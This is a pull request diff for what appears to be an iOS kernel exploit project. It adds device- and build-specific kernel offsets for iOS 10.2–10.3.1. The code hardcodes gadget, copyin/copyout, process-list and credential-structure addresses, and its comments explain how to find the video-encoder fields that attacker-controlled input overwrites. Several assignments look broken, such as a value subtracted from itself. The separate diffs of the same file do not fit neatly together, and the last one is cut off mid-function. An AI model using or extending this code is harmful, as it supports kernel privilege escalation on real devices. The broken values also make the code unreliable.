### PR TITLE
Offsets for all 64bit iPads,iPods,iPhones iOS 10.2-10.3.1

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,5 @@
+bin/
+build/
+IOKit/
+.DS_Store
+ziva

--- a/offsets.m
+++ b/offsets.m
@@ -6,7 +6,7 @@
 #include <strings.h>
 #include <sys/utsname.h>
 #include <errno.h>
-#import <sys/sysctl.h>    
+#import <sys/sysctl.h>
 
 static offsets_t g_offsets;
 static void * g_kernel_base = NULL;
@@ -19,8 +19,8 @@ static void * g_kernel_base = NULL;
  */
 
 void * offsets_get_kernel_base() {
-	
-	return g_kernel_base;
+    
+    return g_kernel_base;
 }
 
 /*
@@ -30,8 +30,8 @@ void * offsets_get_kernel_base() {
  */
 
 void offsets_set_kernel_base(void * kernel_base) {
-	
-	g_kernel_base = kernel_base;
+    
+    g_kernel_base = kernel_base;
 }
 
 
@@ -44,164 +44,164 @@ void offsets_set_kernel_base(void * kernel_base) {
  */
 
 offsets_t offsets_get_offsets() {
-	
-	return g_offsets;
+    
+    return g_offsets;
 }
 
 
 
 typedef void (*init_func)(void);
 
-void init_iphone_6_14c92() {
-
-	g_offsets.kernel_base = 0xFFFFFFF0060CC000;
-
-	/*
-		Find the string "AVE ERROR: SetSessionSettings chroma_format_idc = %d."
-		There's only one usage. The branch is being called from the same place.
-		There's a check whether 0 <= chroma <= 4, Taken from *(X19 + W8)
-		The only call from that branch is just below a lot of memcpys.
-
-		Let's say that W8 is 0x4AD0 (our case for that symbol).
-		We see that there's a memcpy(X19 + 0x4AA8, X27 + 0x3B70, 0x5AC)
-		Our chroma offset falls within that memcpy.
-		So if 0x4AD0 is the chroma offset, 0x4AD0 - 0x4AA8 == 0x28.
-		The memcpy from our controlled input starts at 0x3B70 in that case.
-		Therefore the chroma format offset is 0x3B70 + 0x28.
-	*/
-	g_offsets.encode_frame_offset_chroma_format_idc = (0x3B70+0x28);
-
-	/*
-		The same as before goes here, ui32Width is being checked, it has to be > 0xC0
-		It just checked just slightly after the chroma format IDC check.
-		We see that the memcpy that is responsible for copying ui32Width looks like that:
-		memcpy(X19 + 0x194C, X27 + 0xA14)
-		X28 is ui32Width in our case, which is X19 + 0x194C.
-		Therefore 0xA14 is ui32Width in our case
-	*/
-	g_offsets.encode_frame_offset_ui32_width = (0xA10+4);
-
-	/*
-		Just the same explanation as before, but instead of 0x194C, 0x1950 is being checked.
-		Hence we just increase by 4, because it is being copied by the same memcpy as before.
-	*/
-	g_offsets.encode_frame_offset_ui32_height = (0xA10+8);
-
-	/*
-		Pretty much the same like before. String reference is "AVE ERROR: SlicesPerFrame  = %d" this time.
-		Slices per frame is being checked at offset 0x1CC0.
-		The responsible memcpy is memcpy(X19 + 0x1C90, X27 + 0xD58, 0x2E18)
-		0x1CC0 - 0x1C90 == 0x30.
-		It starts to be copied from our input buffer at offset 0xD58.
-		Hence the offset, 0xD58(where our input buffer is being copied) + 0x30(offset from copied dest starting point)
-	*/
-	g_offsets.encode_frame_offset_slice_per_frame = (0xD58+0x30);
-
-	/*
- 		I don't think it's ever going to change..
-	*/
-	g_offsets.encode_frame_offset_info_type = (0x10);
-
-	/*
-		There are 2 usages of the following string:
-		"AVE WARNING: m_PoweredDownWithClientsStillRegistered = true - ask to reset, the HW is in a bad state..."
-		One just slightly above an IOMalloc(0x28), one somewhere else.
-		Go to the one above the IOMalloc.
-		Above the IOMalloc there's something that looks like the following:
-			LDR             X0, [X23,#0x11D8]
-			CBNZ            X0, somewhere
-			MOV             W0, #0x28
-			BL              _IOMalloc
-			STR             X0, [X23,#0x11D8]
-
-		The offset is where the IOMalloc put its allocated address.
-	*/
-	g_offsets.encode_frame_offset_iosurface_buffer_mgr = (0x11D8);
-
-	/*
+void init_RELEASE_ARM64_T7001_1630() {
+    
+    g_offsets.kernel_base = 0xFFFFFFF0060CC000;
+    
+    /*
+     Find the string "AVE ERROR: SetSessionSettings chroma_format_idc = %d."
+     There's only one usage. The branch is being called from the same place.
+     There's a check whether 0 <= chroma <= 4, Taken from *(X19 + W8)
+     The only call from that branch is just below a lot of memcpys.
+     
+     Let's say that W8 is 0x4AD0 (our case for that symbol).
+     We see that there's a memcpy(X19 + 0x4AA8, X27 + 0x3B70, 0x5AC)
+     Our chroma offset falls within that memcpy.
+     So if 0x4AD0 is the chroma offset, 0x4AD0 - 0x4AA8 == 0x28.
+     The memcpy from our controlled input starts at 0x3B70 in that case.
+     Therefore the chroma format offset is 0x3B70 + 0x28.
+     */
+    g_offsets.encode_frame_offset_chroma_format_idc = (0x3B70+0x28);
+    
+    /*
+     The same as before goes here, ui32Width is being checked, it has to be > 0xC0
+     It just checked just slightly after the chroma format IDC check.
+     We see that the memcpy that is responsible for copying ui32Width looks like that:
+     memcpy(X19 + 0x194C, X27 + 0xA14)
+     X28 is ui32Width in our case, which is X19 + 0x194C.
+     Therefore 0xA14 is ui32Width in our case
+     */
+    g_offsets.encode_frame_offset_ui32_width = (0xA10+4);
+    
+    /*
+     Just the same explanation as before, but instead of 0x194C, 0x1950 is being checked.
+     Hence we just increase by 4, because it is being copied by the same memcpy as before.
+     */
+    g_offsets.encode_frame_offset_ui32_height = (0xA10+8);
+    
+    /*
+     Pretty much the same like before. String reference is "AVE ERROR: SlicesPerFrame  = %d" this time.
+     Slices per frame is being checked at offset 0x1CC0.
+     The responsible memcpy is memcpy(X19 + 0x1C90, X27 + 0xD58, 0x2E18)
+     0x1CC0 - 0x1C90 == 0x30.
+     It starts to be copied from our input buffer at offset 0xD58.
+     Hence the offset, 0xD58(where our input buffer is being copied) + 0x30(offset from copied dest starting point)
+     */
+    g_offsets.encode_frame_offset_slice_per_frame = (0xD58+0x30);
+    
+    /*
+     I don't think it's ever going to change..
+     */
+    g_offsets.encode_frame_offset_info_type = (0x10);
+    
+    /*
+     There are 2 usages of the following string:
+     "AVE WARNING: m_PoweredDownWithClientsStillRegistered = true - ask to reset, the HW is in a bad state..."
+     One just slightly above an IOMalloc(0x28), one somewhere else.
+     Go to the one above the IOMalloc.
+     Above the IOMalloc there's something that looks like the following:
+     LDR             X0, [X23,#0x11D8]
+     CBNZ            X0, somewhere
+     MOV             W0, #0x28
+     BL              _IOMalloc
+     STR             X0, [X23,#0x11D8]
+     
+     The offset is where the IOMalloc put its allocated address.
+     */
+    g_offsets.encode_frame_offset_iosurface_buffer_mgr = (0x11D8);
+    
+    /*
 	    Find the following string:
 	    "AVE ERROR: IMG_V_EncodeAndSendFrame multiPassEndPassCounterEnc (%d) >= H264VIDEOENCODER_MULTI_PASS_PASSES\n"
 	    That's the check that, if not passed, leads to the print of that string:
-	    	LDR             W25, [X22,#0xC]
-	    	CMP             W25, #2
-	    	B.CC            somewhere
-
+     LDR             W25, [X22,#0xC]
+     CMP             W25, #2
+     B.CC            somewhere
+     
 	    The offset from X22 is what we should put here.
-	*/
-	g_offsets.kernel_address_multipass_end_pass_counter_enc = (0xC);
-
-	/*
-		There's a string "inputYUV" which is being used twice.
-		One time, just above _mach_absolute_time, one time somewhere else.
-		Above it, we see the following:
-			MOV             W8, #0x4A88
-			LDRB            W7, [X19,X8]
-
-		Just like before, the X19 is from our memcpy, so we see that the responsible memcpy is:
-		memcpy(X19 + 0x1C90, X27 + 0xD58, 0x2E18)
-
-		So 0x4A88 - 0x1C90 == 0x2DF8
-		So 0x2DF8 + 0xD58(that's where they start copying from our input buffer) == 0x3B50.
-	*/
-	g_offsets.encode_frame_offset_keep_cache = (0x3B50);
-
-	/* Vtable address of IOSurface */
-
-	g_offsets.iofence_vtable_offset = 0xFFFFFFF006EF4B08 - g_offsets.kernel_base;
-
-	/* IOFence current fences list head in the IOSurface object */
-
-	g_offsets.iosurface_current_fences_list_head = 0x210;
-
-	g_offsets.panic = 0xFFFFFFF0070B6DD0 - g_offsets.kernel_base;
-
-	g_offsets.osserializer_serialize = 0xFFFFFFF00745B0DC - g_offsets.kernel_base;
-
-	g_offsets.copyin = 0xFFFFFFF00718F748 - g_offsets.kernel_base;
-
-	g_offsets.copyout = 0xFFFFFFF00718F950 - g_offsets.kernel_base;
-
-	g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base;
-
-	g_offsets.kern_proc = 0xFFFFFFF0075C20E0 - g_offsets.kernel_base;
-
-	g_offsets.l1dcachesize_handler = 0xFFFFFFF00753A628 - g_offsets.kernel_base;
-
-	g_offsets.l1dcachesize_string = 0xFFFFFFF007057890 - g_offsets.kernel_base;
-
-	g_offsets.l1icachesize_string = 0xFFFFFFF007057883 - g_offsets.kernel_base;
-
-	g_offsets.quad_format_string = 0xFFFFFFF007069601 - g_offsets.quad_format_string;
-
-	g_offsets.null_terminator = 0xFFFFFFF00706A407 - g_offsets.kernel_base;
-
-	g_offsets.cachesize_callback = 0xFFFFFFF0073BE284 - g_offsets.kernel_base;
-
-	g_offsets.sysctl_hw_family = 0xFFFFFFF00753A678 - g_offsets.kernel_base;
-
-	g_offsets.ret_gadget = 0xFFFFFFF0070B55B8 - g_offsets.kernel_base;
-
-	g_offsets.struct_proc_p_comm = 0x26C;
-
-	g_offsets.struct_proc_p_ucred = 0x100;
-
-	g_offsets.struct_kauth_cred_cr_ref = 0x10;
-
-	g_offsets.struct_proc_p_uthlist = 0x98;
-
-	g_offsets.struct_uthread_uu_ucred = 0x168;
-	
+     */
+    g_offsets.kernel_address_multipass_end_pass_counter_enc = (0xC);
+    
+    /*
+     There's a string "inputYUV" which is being used twice.
+     One time, just above _mach_absolute_time, one time somewhere else.
+     Above it, we see the following:
+     MOV             W8, #0x4A88
+     LDRB            W7, [X19,X8]
+     
+     Just like before, the X19 is from our memcpy, so we see that the responsible memcpy is:
+     memcpy(X19 + 0x1C90, X27 + 0xD58, 0x2E18)
+     
+     So 0x4A88 - 0x1C90 == 0x2DF8
+     So 0x2DF8 + 0xD58(that's where they start copying from our input buffer) == 0x3B50.
+     */
+    g_offsets.encode_frame_offset_keep_cache = (0x3B50);
+    
+    /* Vtable address of IOSurface */
+    
+    g_offsets.iofence_vtable_offset = 0xFFFFFFF006EF4B08 - g_offsets.kernel_base;
+    
+    /* IOFence current fences list head in the IOSurface object */
+    
+    g_offsets.iosurface_current_fences_list_head = 0x210;
+    
+    g_offsets.panic = 0xFFFFFFF0070B6DD0 - g_offsets.kernel_base;
+    
+    g_offsets.osserializer_serialize = 0xFFFFFFF00745B0DC - g_offsets.kernel_base;
+    
+    g_offsets.copyin = 0xFFFFFFF00718F748 - g_offsets.kernel_base;
+    
+    g_offsets.copyout = 0xFFFFFFF00718F950 - g_offsets.kernel_base;
+    
+    g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base;
+    
+    g_offsets.kern_proc = 0xFFFFFFF0075C20E0 - g_offsets.kernel_base;
+    
+    g_offsets.l1dcachesize_handler = 0xFFFFFFF00753A628 - g_offsets.kernel_base;
+    
+    g_offsets.l1dcachesize_string = 0xFFFFFFF007057890 - g_offsets.kernel_base;
+    
+    g_offsets.l1icachesize_string = 0xFFFFFFF007057883 - g_offsets.kernel_base;
+    
+    g_offsets.quad_format_string = 0xFFFFFFF007069601 - g_offsets.quad_format_string;
+    
+    g_offsets.null_terminator = 0xFFFFFFF00706A407 - g_offsets.kernel_base;
+    
+    g_offsets.cachesize_callback = 0xFFFFFFF0073BE284 - g_offsets.kernel_base;
+    
+    g_offsets.sysctl_hw_family = 0xFFFFFFF00753A678 - g_offsets.kernel_base;
+    
+    g_offsets.ret_gadget = 0xFFFFFFF0070B55B8 - g_offsets.kernel_base;
+    
+    g_offsets.struct_proc_p_comm = 0x26C;
+    
+    g_offsets.struct_proc_p_ucred = 0x100;
+    
+    g_offsets.struct_kauth_cred_cr_ref = 0x10;
+    
+    g_offsets.struct_proc_p_uthlist = 0x98;
+    
+    g_offsets.struct_uthread_uu_ucred = 0x168;
+    
     g_offsets.struct_uthread_uu_list = 0x170;
-
-    /* 
-    	IOSurface->lockSurface 
+    
+    /*
+    	IOSurface->lockSurface
     	Find "H264IOSurfaceBuf ERROR: lockSurface failed."
     	Both strings have BLR X8 above them.
     	Find the nearest LDR X8, [something, OFFSET].
     	The OFFSET is mostly 0x98. If something else, then change this.
-    */
+     */
     g_offsets.iosurface_vtable_offset_kernel_hijack = 0x98;
-
+    
 }
 
 /*
@@ -212,31 +212,31 @@ void init_iphone_6_14c92() {
 
 static
 kern_return_t offsets_get_os_build_version(char * os_build_version) {
-	
-	kern_return_t ret = KERN_SUCCESS;
-	int mib[2] = {CTL_KERN, KERN_OSVERSION};
-	uint32_t namelen = sizeof(mib) / sizeof(mib[0]);
-	size_t buffer_size = 0;
-	char * errno_str = NULL;
-
-	ret = sysctl(mib, namelen, NULL, &buffer_size, NULL, 0);
-	if (KERN_SUCCESS != ret)
-	{
-		errno_str = strerror(errno);
-		ERROR_LOG("error getting OS version's buffer size: %s", errno_str);
-		goto cleanup;
-	}
-
-	ret = sysctl(mib, namelen, os_build_version, &buffer_size, NULL, 0);
-	if (KERN_SUCCESS != ret)
-	{
-		errno_str = strerror(errno);
-		ERROR_LOG("Error getting OS version: %s", errno_str);	
-		goto cleanup;
-	}
-
+    
+    kern_return_t ret = KERN_SUCCESS;
+    int mib[2] = {CTL_KERN, KERN_OSVERSION};
+    uint32_t namelen = sizeof(mib) / sizeof(mib[0]);
+    size_t buffer_size = 0;
+    char * errno_str = NULL;
+    
+    ret = sysctl(mib, namelen, NULL, &buffer_size, NULL, 0);
+    if (KERN_SUCCESS != ret)
+    {
+        errno_str = strerror(errno);
+        ERROR_LOG("error getting OS version's buffer size: %s", errno_str);
+        goto cleanup;
+    }
+    
+    ret = sysctl(mib, namelen, os_build_version, &buffer_size, NULL, 0);
+    if (KERN_SUCCESS != ret)
+    {
+        errno_str = strerror(errno);
+        ERROR_LOG("Error getting OS version: %s", errno_str);
+        goto cleanup;
+    }
+    
 cleanup:
-	return ret;
+    return ret;
 }
 
 /*
@@ -247,32 +247,32 @@ cleanup:
 
 static
 kern_return_t offsets_get_device_type_and_version(char * machine, char * build) {
-	
-	kern_return_t ret = KERN_SUCCESS;
-	struct utsname u;
-	char os_build_version[0x100] = {0};
-
-	memset(&u, 0, sizeof(u));
-
-	ret = uname(&u);
-	if (ret)
-	{
-		ERROR_LOG("Error uname-ing");
-		goto cleanup;
-	}
-
-	ret = offsets_get_os_build_version(os_build_version);
-	if (KERN_SUCCESS != ret)
-	{
-		ERROR_LOG("Error getting OS Build version!");
-		goto cleanup;
-	}
-
-	strcpy(machine, u.machine);
-	strcpy(build, os_build_version);
-
+    
+    kern_return_t ret = KERN_SUCCESS;
+    struct utsname u;
+    char os_build_version[0x100] = {0};
+    
+    memset(&u, 0, sizeof(u));
+    
+    ret = uname(&u);
+    if (ret)
+    {
+        ERROR_LOG("Error uname-ing");
+        goto cleanup;
+    }
+    
+    ret = offsets_get_os_build_version(os_build_version);
+    if (KERN_SUCCESS != ret)
+    {
+        ERROR_LOG("Error getting OS Build version!");
+        goto cleanup;
+    }
+    
+    strcpy(machine, u.machine);
+    strcpy(build, os_build_version);
+    
 cleanup:
-	return ret;
+    return ret;
 }
 
 
@@ -284,29 +284,34 @@ cleanup:
 
 static
 kern_return_t offsets_determine_initializer_for_device_and_build(char * device, char * build, init_func * func) {
-	
-	kern_return_t ret = KERN_INVALID_HOST;
-
-	if (strstr(device, "iPhone7,2"))
-	{
-		DEBUG_LOG("Detected iPhone 6");
-		if (strstr(build, "14C92"))
-		{
-			DEBUG_LOG("Initializing for iOS 10.2");
-			*func = (init_func)init_iphone_6_14c92;
-			ret = KERN_SUCCESS;
-		}
-		else {
-			ERROR_LOG("Unsupported phone version. quitting.");
-			goto cleanup;
-		}
-	} else {
-		ERROR_LOG("Unsupported device. quitting.");
-		goto cleanup;
-	}
-
+    
+    kern_return_t ret = KERN_INVALID_HOST;
+    
+    struct utsname u = { 0 };
+    uname(&u);
+    
+    printf("sysname: %s\n", u.sysname);
+    printf("nodename: %s\n", u.nodename);
+    printf("release: %s\n", u.release);
+    printf("version: %s\n", u.version);
+    printf("machine: %s\n", u.machine);
+    
+    if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7001");
+        *func = (init_func)init_RELEASE_ARM64_T7001_1630;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7000");
+        *func = (init_func)init_RELEASE_ARM64_T7001_1630;
+        ret = KERN_SUCCESS;
+    } else {
+        ERROR_LOG("Unsupported device. quitting.");
+        goto cleanup;
+    }
+    
 cleanup:
-	return ret;
+    return ret;
 }
 
 
@@ -320,32 +325,32 @@ cleanup:
 
 static
 kern_return_t offsets_get_init_func(init_func * func) {
-	
-	kern_return_t ret = KERN_SUCCESS;
-
-	char machine[0x100] = {0};
-	char build[0x100] = {0};
-
-	ret = offsets_get_device_type_and_version(machine, build);
-	if (KERN_SUCCESS != ret)
-	{
-		ERROR_LOG("Error getting device type and build version");
-		goto cleanup;
-	}
-
-	DEBUG_LOG("machine: %s", machine);
-	DEBUG_LOG("build: %s", build);
-
-	ret = offsets_determine_initializer_for_device_and_build(machine, build, func);
-	if (KERN_SUCCESS != ret)
-	{
-		ERROR_LOG("Error finding the appropriate function loader for the specific host");
-		goto cleanup;
-	}
-
-
+    
+    kern_return_t ret = KERN_SUCCESS;
+    
+    char machine[0x100] = {0};
+    char build[0x100] = {0};
+    
+    ret = offsets_get_device_type_and_version(machine, build);
+    if (KERN_SUCCESS != ret)
+    {
+        ERROR_LOG("Error getting device type and build version");
+        goto cleanup;
+    }
+    
+    DEBUG_LOG("machine: %s", machine);
+    DEBUG_LOG("build: %s", build);
+    
+    ret = offsets_determine_initializer_for_device_and_build(machine, build, func);
+    if (KERN_SUCCESS != ret)
+    {
+        ERROR_LOG("Error finding the appropriate function loader for the specific host");
+        goto cleanup;
+    }
+    
+    
 cleanup:
-	return ret;
+    return ret;
 }
 
 
@@ -358,22 +363,22 @@ cleanup:
  */
 
 kern_return_t offsets_init() {
-	
-	kern_return_t ret = 0;
-	init_func func = NULL;
-
-	memset(&g_offsets, 0, sizeof(g_offsets));
-
-	ret = offsets_get_init_func(&func);
-	if (KERN_SUCCESS != ret)
-	{
-		ERROR_LOG("Error initializing offsets. No exploit for you!");
-		goto cleanup;
-	}
-
-	func();
-
+    
+    kern_return_t ret = 0;
+    init_func func = NULL;
+    
+    memset(&g_offsets, 0, sizeof(g_offsets));
+    
+    ret = offsets_get_init_func(&func);
+    if (KERN_SUCCESS != ret)
+    {
+        ERROR_LOG("Error initializing offsets. No exploit for you!");
+        goto cleanup;
+    }
+    
+    func();
+    
 cleanup:
-	return ret;
+    return ret;
 }
 

--- a/offsets.m
+++ b/offsets.m
@@ -469,8 +469,6 @@ cleanup:
     return ret;
 }
 
-void init_iphone_6_14c92() {}
-
 
 /*
  * Function name: 	offsets_determine_initializer_for_device_and_build

--- a/offsets.m
+++ b/offsets.m
@@ -226,6 +226,44 @@ void init_RELEASE_ARM64_T8010_1650_37895227() {
     g_offsets.quad_format_string = 0xfffffff00705dda2 - g_offsets.quad_format_string;
     g_offsets.null_terminator = 0xfffffff00705e40f - g_offsets.kernel_base;
 }
+void init_RELEASE_ARM64_T7001_1650_37895227() {
+    g_offsets.kernel_base = 0xfffffff006038000;
+    g_offsets.l1icachesize_string = 0xfffffff007057a83 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744d8d0 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b40c8 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b3d24 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff006038000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752a320 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006405f70 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ecd0a0 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752a370 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff007057a90 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718d4a0 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075ae7a0 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718d694 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070b69b8 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff007069de1 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00706a40f - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_T7001_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff006070000;
+    g_offsets.l1icachesize_string = 0xfffffff007057883 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00745b300 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075c20e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073be4a8 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff006070000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00753a678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006401da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ed8748 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00753a628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff007057890 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718f840 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075bc528 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718fa48 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070b6dd0 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff007069601 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00706a407 - g_offsets.kernel_base;
+}
 void init_RELEASE_ARM64_S8000_1630_37893214() {
     g_offsets.kernel_base = 0xfffffff00605c000;
     g_offsets.l1icachesize_string = 0xfffffff00704b885 - g_offsets.kernel_base;
@@ -263,6 +301,25 @@ void init_RELEASE_ARM64_T7000_1630_37894221() {
     g_offsets.panic = 0xfffffff0070b6dd0 - g_offsets.kernel_base;
     g_offsets.quad_format_string = 0xfffffff007069601 - g_offsets.quad_format_string;
     g_offsets.null_terminator = 0xfffffff00706a407 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S5L8960X_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff0061bc000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b893 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744ee4c - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b60e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b1ff4 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff0061bc000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752e678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0064c1da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006f2bd88 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752e628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b8a0 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff0071835b8 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075b0418 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff0071837c0 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aac30 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d611 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e411 - g_offsets.kernel_base;
 }
 void init_RELEASE_ARM64_T7000_1650_37895227() {
     g_offsets.kernel_base = 0xfffffff006118000;
@@ -302,21 +359,21 @@ void init_RELEASE_ARM64_S8000_1650_37895227() {
     g_offsets.quad_format_string = 0xfffffff00705dde3 - g_offsets.quad_format_string;
     g_offsets.null_terminator = 0xfffffff00705e411 - g_offsets.kernel_base;
 }
-void init_RELEASE_ARM64_T7000_1630_37893214() {
-    g_offsets.kernel_base = 0xfffffff0060cc000;
+void init_RELEASE_ARM64_T7001_1630_37894221() {
+    g_offsets.kernel_base = 0xfffffff006070000;
     g_offsets.l1icachesize_string = 0xfffffff007057883 - g_offsets.kernel_base;
-    g_offsets.osserializer_serialize = 0xfffffff00745b0dc - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00745b324 - g_offsets.kernel_base;
     g_offsets.kern_proc = 0xfffffff0075c20e0 - g_offsets.kernel_base;
-    g_offsets.cachesize_callback = 0xfffffff0073be284 - g_offsets.kernel_base;
-    g_offsets.kernel_base = 0xfffffff0060cc000 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073be4cc - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff006070000 - g_offsets.kernel_base;
     g_offsets.sysctl_hw_family = 0xfffffff00753a678 - g_offsets.kernel_base;
-    g_offsets.ret_gadget = 0xfffffff006455da0 - g_offsets.kernel_base;
-    g_offsets.iofence_vtable_offset = 0xfffffff006ef4b08 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006401da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ed8748 - g_offsets.kernel_base;
     g_offsets.l1dcachesize_handler = 0xfffffff00753a628 - g_offsets.kernel_base;
     g_offsets.l1dcachesize_string = 0xfffffff007057890 - g_offsets.kernel_base;
-    g_offsets.copyin = 0xfffffff00718f748 - g_offsets.kernel_base;
-    g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base;
-    g_offsets.copyout = 0xfffffff00718f950 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718f864 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075bc528 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718fa6c - g_offsets.kernel_base;
     g_offsets.panic = 0xfffffff0070b6dd0 - g_offsets.kernel_base;
     g_offsets.quad_format_string = 0xfffffff007069601 - g_offsets.quad_format_string;
     g_offsets.null_terminator = 0xfffffff00706a407 - g_offsets.kernel_base;
@@ -359,24 +416,24 @@ void init_RELEASE_ARM64_T8010_1630_37893214() {
     g_offsets.quad_format_string = 0xfffffff00705d5d1 - g_offsets.quad_format_string;
     g_offsets.null_terminator = 0xfffffff00705e416 - g_offsets.kernel_base;
 }
-void init_RELEASE_ARM64_S5L8960X_1630_37893214() {
-    g_offsets.kernel_base = 0xfffffff0061bc000;
-    g_offsets.l1icachesize_string = 0xfffffff00704b893 - g_offsets.kernel_base;
-    g_offsets.osserializer_serialize = 0xfffffff00744ee4c - g_offsets.kernel_base;
-    g_offsets.kern_proc = 0xfffffff0075b60e0 - g_offsets.kernel_base;
-    g_offsets.cachesize_callback = 0xfffffff0073b1ff4 - g_offsets.kernel_base;
-    g_offsets.kernel_base = 0xfffffff0061bc000 - g_offsets.kernel_base;
-    g_offsets.sysctl_hw_family = 0xfffffff00752e678 - g_offsets.kernel_base;
-    g_offsets.ret_gadget = 0xfffffff0064c1da0 - g_offsets.kernel_base;
-    g_offsets.iofence_vtable_offset = 0xfffffff006f2bd88 - g_offsets.kernel_base;
-    g_offsets.l1dcachesize_handler = 0xfffffff00752e628 - g_offsets.kernel_base;
-    g_offsets.l1dcachesize_string = 0xfffffff00704b8a0 - g_offsets.kernel_base;
-    g_offsets.copyin = 0xfffffff0071835b8 - g_offsets.kernel_base;
-    g_offsets.all_proc = 0xfffffff0075b0418 - g_offsets.kernel_base;
-    g_offsets.copyout = 0xfffffff0071837c0 - g_offsets.kernel_base;
-    g_offsets.panic = 0xfffffff0070aac30 - g_offsets.kernel_base;
-    g_offsets.quad_format_string = 0xfffffff00705d611 - g_offsets.quad_format_string;
-    g_offsets.null_terminator = 0xfffffff00705e411 - g_offsets.kernel_base;
+void init_RELEASE_ARM64_T7000_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff0060cc000;
+    g_offsets.l1icachesize_string = 0xfffffff007057883 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00745b0dc - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075c20e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073be284 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff0060cc000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00753a678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006455da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ef4b08 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00753a628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff007057890 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718f748 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base;
